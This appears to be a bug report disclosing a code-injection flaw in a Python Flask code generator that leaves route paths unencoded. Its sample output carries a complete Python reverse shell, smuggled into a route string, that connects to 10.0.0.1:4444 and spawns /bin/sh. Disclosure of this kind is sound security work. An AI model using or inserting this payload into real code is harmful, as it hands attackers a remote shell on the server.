from flask import Blueprint, request
from webargs.flaskparser import parser
from marshmallow import Schema, fields
from ..schemas import model
from .. import impl
bp = Blueprint('nothing', __name__)
@bp.route('/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#', methods=['get'])
def CodeInjection():
return impl.nothing.CodeInjection()
Describe the bug Python code generator does not encode payloads and could be used to inject malicious payloads.
To Reproduce If you create a definition as follows, you can see the Python code generation does not encode the paths data that is sent.
This results in:
Screenshots
![image](https://user-images.githubusercontent.com/5957650/173449072-37bacf6e-b199-464b-8953-273b87715e52.png)